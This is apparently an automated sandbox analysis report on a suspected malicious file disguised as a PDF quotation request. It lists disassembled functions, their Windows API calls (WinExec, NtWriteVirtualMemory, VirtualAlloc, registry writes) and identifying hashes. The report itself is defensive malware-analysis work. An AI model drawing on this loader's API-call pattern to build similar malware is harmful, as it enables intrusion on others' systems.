                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                  • String ID: Kernel32$WinExec
                                                                  • API String ID: 2292790416-3609268280
                                                                  • Opcode ID: 4126f8f23b299e335ff682c0db06fee780c14d24ee6ace1d48878a1df9d3c70d
                                                                  • Instruction ID: 3a575a91d82a32db9d98511bd65a9ce07b3903b933f34c4c2dd52a5a50698c64
                                                                  • Opcode Fuzzy Hash: 4126f8f23b299e335ff682c0db06fee780c14d24ee6ace1d48878a1df9d3c70d
                                                                  • Instruction Fuzzy Hash: 2C018134748304BFEB11EFA4DD15B6A77EDFB88700F518820B908D3A40E674AD048B24
                                                                  Function 02968410 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • WinExec.KERNEL32(?,?), ref: 02968478
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                  • String ID: Kernel32$WinExec
                                                                  • API String ID: 2292790416-3609268280
                                                                  • Opcode ID: 188bf53ced399d56d2c50d267ff059123a43db5099250f73c7dd2f06e797696e
                                                                  • Instruction ID: bd24a8b3dd9e746dcf7f1a901e5150c9948817f1130aaab9388ba3cd841d7d7e
                                                                  • Opcode Fuzzy Hash: 188bf53ced399d56d2c50d267ff059123a43db5099250f73c7dd2f06e797696e
                                                                  • Instruction Fuzzy Hash: C9F08134748304BFEB11EFA4DD15B6A77EDFB88700F518820B908D3A40E674A9048B24
                                                                  Function 02965BB4 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02965CFC,?,?,02963888,00000001), ref: 02965C10
                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02965CFC,?,?,02963888,00000001), ref: 02965C3E
                                                                    • Part of subcall function 02957D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02963888,02965C7E,00000000,02965CFC,?,?,02963888), ref: 02957D66
                                                                    • Part of subcall function 02957F20: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02963888,02965C99,00000000,02965CFC,?,?,02963888,00000001), ref: 02957F3F
                                                                  • GetLastError.KERNEL32(00000000,02965CFC,?,?,02963888,00000001), ref: 02965CA3
                                                                    • Part of subcall function 0295A700: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0295C361,00000000,0295C3BB), ref: 0295A71F
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                  • String ID:
                                                                  • API String ID: 503785936-0
                                                                  • Opcode ID: 8e1000ef1f7dfa6fbb0d1de0d064c90285af883b560deb0b9842f64750bc8766
                                                                  • Instruction ID: 00fdbbe1d748d68b14328054b6028ecda7a05db99e8833952b4a146db241b397
                                                                  • Opcode Fuzzy Hash: 8e1000ef1f7dfa6fbb0d1de0d064c90285af883b560deb0b9842f64750bc8766
                                                                  • Instruction Fuzzy Hash: 29317270B042189FDB00EFA4C885BAEBBF6AF88714F918565E904A7380D7755A05CFA5
                                                                  Function 0296E6BE Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,02AA5914), ref: 0296E704
                                                                  • RegSetValueExA.ADVAPI32(00000868,00000000,00000000,00000001,00000000,0000001C,00000000,0296E76F), ref: 0296E73C
                                                                  • RegCloseKey.ADVAPI32(00000868,00000868,00000000,00000000,00000001,00000000,0000001C,00000000,0296E76F), ref: 0296E747
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenValue
                                                                  • String ID:
                                                                  • API String ID: 779948276-0
                                                                  • Opcode ID: 38e3d1b0a082a074811b1018f02fcee6ba91e50eac31540792eeeff9b3eee947
                                                                  • Instruction ID: 2bb95d3201db9402fc3b19cd71d75b517aa87d25af1c8bc53865dfbd37228de4
                                                                  • Opcode Fuzzy Hash: 38e3d1b0a082a074811b1018f02fcee6ba91e50eac31540792eeeff9b3eee947
                                                                  • Instruction Fuzzy Hash: C911FB71F50214AFEB80EFA8D891D6A7BFDFB89750B904460F904DB250DB30DA419FA5
                                                                  Function 0296E6C0 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,02AA5914), ref: 0296E704
                                                                  • RegSetValueExA.ADVAPI32(00000868,00000000,00000000,00000001,00000000,0000001C,00000000,0296E76F), ref: 0296E73C
                                                                  • RegCloseKey.ADVAPI32(00000868,00000868,00000000,00000000,00000001,00000000,0000001C,00000000,0296E76F), ref: 0296E747
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenValue
                                                                  • String ID:
                                                                  • API String ID: 779948276-0
                                                                  • Opcode ID: 429685aafb1f0423c3075eb4ed97f726c355dae40588d9be824544bce8dc5a53
                                                                  • Instruction ID: 93da064e167e3a6af5e31de8b85564b345c92abeb1aec472fb6abcb55643c54c
                                                                  • Opcode Fuzzy Hash: 429685aafb1f0423c3075eb4ed97f726c355dae40588d9be824544bce8dc5a53
                                                                  • Instruction Fuzzy Hash: A111FB71F50214AFEB80EFA8D891D6A7BFDFB89750B904460F904DB250DB30DA419FA5
                                                                  Function 0295E2EC Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: 267ec73f837a22084bb625745d97ddeba1147278adbea43bd0e3337bb8b5c2ea
                                                                  • Instruction ID: a3692c50ababbe6ca156e7cd0b1cb52068f9ddde09cab1832630592fca541a15
                                                                  • Opcode Fuzzy Hash: 267ec73f837a22084bb625745d97ddeba1147278adbea43bd0e3337bb8b5c2ea
                                                                  • Instruction Fuzzy Hash: 8BF0C220B0423086D729FB38E9C867D279AAFC0700B401836ECC69B245CB36CE45CB62
                                                                  Function 02954CFC Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SysFreeString.OLEAUT32(0296E950), ref: 02954C1A
                                                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 02954D07
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02954D19
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: String$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 986138563-0
                                                                  • Opcode ID: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                  • Instruction ID: d3e76f117504b98a7e4ab72bfe3d094b5769b9b1efbc6131a9a5a3e8e66faa92
                                                                  • Opcode Fuzzy Hash: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                  • Instruction Fuzzy Hash: B5E012B83052215EFB54AF21DC40B3B377EAFC1741B145899AC04CE150DB74C481AF75
                                                                  Function 02967064 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SysFreeString.OLEAUT32(?), ref: 02967362
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FreeString
                                                                  • String ID: H
                                                                  • API String ID: 3341692771-2852464175
                                                                  • Opcode ID: d1562af47b978fe99d49394e836d4b70f4f7c19311579dd3a5bef6fb32d83392
                                                                  • Instruction ID: aacec5aed3eb4f6a7436178384c9bb416eb3d3b091485ebc52803f70979f5d8f
                                                                  • Opcode Fuzzy Hash: d1562af47b978fe99d49394e836d4b70f4f7c19311579dd3a5bef6fb32d83392
                                                                  • Instruction Fuzzy Hash: CDB1D274A01608DFDB14CFA9D884AADFBF6FF89318F258569E805AB360D731A845CF50
                                                                  Function 02968824 Relevance: 3.1, APIs: 2, Instructions: 65libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(00000000,00000000,0296890B), ref: 02968858
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                    • Part of subcall function 02967D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02967D74
                                                                  • FreeLibrary.KERNEL32(74B30000,00000000,029B1388,Function_000065D8,00000004,029B1398,029B1388,05F5E0FF,00000040,029B139C,74B30000,00000000,00000000,00000000,00000000,0296890B), ref: 029688EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                                  • String ID:
                                                                  • API String ID: 3283153180-0
                                                                  • Opcode ID: ba5259e4893c499ccde6fa1b45818ec83459722db5919d1d3f270ae1c36ea2cb
                                                                  • Instruction ID: 2ebe914658a2a8701543dbbedbfe35c3cb2e88b7798acb79b527e79a1c3618f8
                                                                  • Opcode Fuzzy Hash: ba5259e4893c499ccde6fa1b45818ec83459722db5919d1d3f270ae1c36ea2cb
                                                                  • Instruction Fuzzy Hash: 92115470B94314ABEB41FFE4C926AAE77F9EFC5700F910465B909A7A80EA3499018B54
                                                                  Function 0295E6E8 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantCopy.OLEAUT32(00000000,00000000), ref: 0295E709
                                                                    • Part of subcall function 0295E2EC: VariantClear.OLEAUT32(?), ref: 0295E2FB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearCopy
                                                                  • String ID:
                                                                  • API String ID: 274517740-0
                                                                  • Opcode ID: 3b12b04349316ef3dbf21d81a064328c4b7c33a92da796470ba3c9384a6113d0
                                                                  • Instruction ID: ad6e873fdd7dbc90b02bf113f701dfab60f1fb0b245799fa5699ddb33ca40470
                                                                  • Opcode Fuzzy Hash: 3b12b04349316ef3dbf21d81a064328c4b7c33a92da796470ba3c9384a6113d0
                                                                  • Instruction Fuzzy Hash: 3D11822070433487CB25EF28CDC466677DADFC5750B045826EDCA8B255DB32CE41CB62
                                                                  Function 029515CC Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02951A03,?,02952000), ref: 029515E2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID: 0`
                                                                  • API String ID: 4275171209-3339448193
                                                                  • Opcode ID: ee0e76aa8867dbe6aa48e7e5e98e774756b81ffdd27208e4c79c3457c6bae8f2
                                                                  • Instruction ID: ff37fde8f06fcba9f66fb5ca4edff5822f2fb35d99f6023e18b19e29dfdc96c9
                                                                  • Opcode Fuzzy Hash: ee0e76aa8867dbe6aa48e7e5e98e774756b81ffdd27208e4c79c3457c6bae8f2
                                                                  • Instruction Fuzzy Hash: A4F06DF0B453004FEB45CF7999543217BD6EB89344F108579D749DB398E77198028B80
                                                                  Function 0295E384 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: InitVariant
                                                                  • String ID:
                                                                  • API String ID: 1927566239-0
                                                                  • Opcode ID: 5671632c9151a8487102b77d5dac057b45480ad17cead370301c11d402be58b2
                                                                  • Instruction ID: 6e877e0237c53cf79b2ace894c4d92a1694dfeff792b295e0c8da03f9b3fa094
                                                                  • Opcode Fuzzy Hash: 5671632c9151a8487102b77d5dac057b45480ad17cead370301c11d402be58b2
                                                                  • Instruction Fuzzy Hash: 97314D71B04228AFDB10DFA8C984ABE77EDEB4C204F444561ED89D7240D736DA51CBA2
                                                                  Function 02966CF4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CLSIDFromProgID.OLE32(00000000,?,00000000,02966D41,?,?,?,00000000), ref: 02966D21
                                                                    • Part of subcall function 02954C0C: SysFreeString.OLEAUT32(0296E950), ref: 02954C1A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FreeFromProgString
                                                                  • String ID:
                                                                  • API String ID: 4225568880-0
                                                                  • Opcode ID: ee086f6a0b307bfec2e0e77caaeef10a94444e832787f3a92919830e3a1c8861
                                                                  • Instruction ID: bf6de451adb4eda2524f235f69251b72447512f62dc7efc82b142a759f4bbeac
                                                                  • Opcode Fuzzy Hash: ee086f6a0b307bfec2e0e77caaeef10a94444e832787f3a92919830e3a1c8861
                                                                  • Instruction Fuzzy Hash: A3E06D31704718BBEB01EBA1CC519AA77FEEFC9B10B914471E801D3650DA78AE009AA0
                                                                  Function 02955814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(02950000,?,00000105), ref: 02955832
                                                                    • Part of subcall function 02955A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02950000,0297D790), ref: 02955A94
                                                                    • Part of subcall function 02955A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02950000,0297D790), ref: 02955AB2
                                                                    • Part of subcall function 02955A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02950000,0297D790), ref: 02955AD0
                                                                    • Part of subcall function 02955A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02955AEE
                                                                    • Part of subcall function 02955A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02955B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02955B37
                                                                    • Part of subcall function 02955A78: RegQueryValueExA.ADVAPI32(?,02955CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02955B7D,?,80000001), ref: 02955B55
                                                                    • Part of subcall function 02955A78: RegCloseKey.ADVAPI32(?,02955B84,00000000,?,?,00000000,02955B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02955B77
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Open$FileModuleNameQueryValue$Close
                                                                  • String ID:
                                                                  • API String ID: 2796650324-0
                                                                  • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                  • Instruction ID: 1d5fa99ff95bde464dac3395688bb520bb77b7d3575fe66c0a1421fe51bcbf15
                                                                  • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                  • Instruction Fuzzy Hash: 48E06571A002248BCB10DE6888C0B8637D8AB08754F8109A5ED58DF34BD3B0ED208BE0
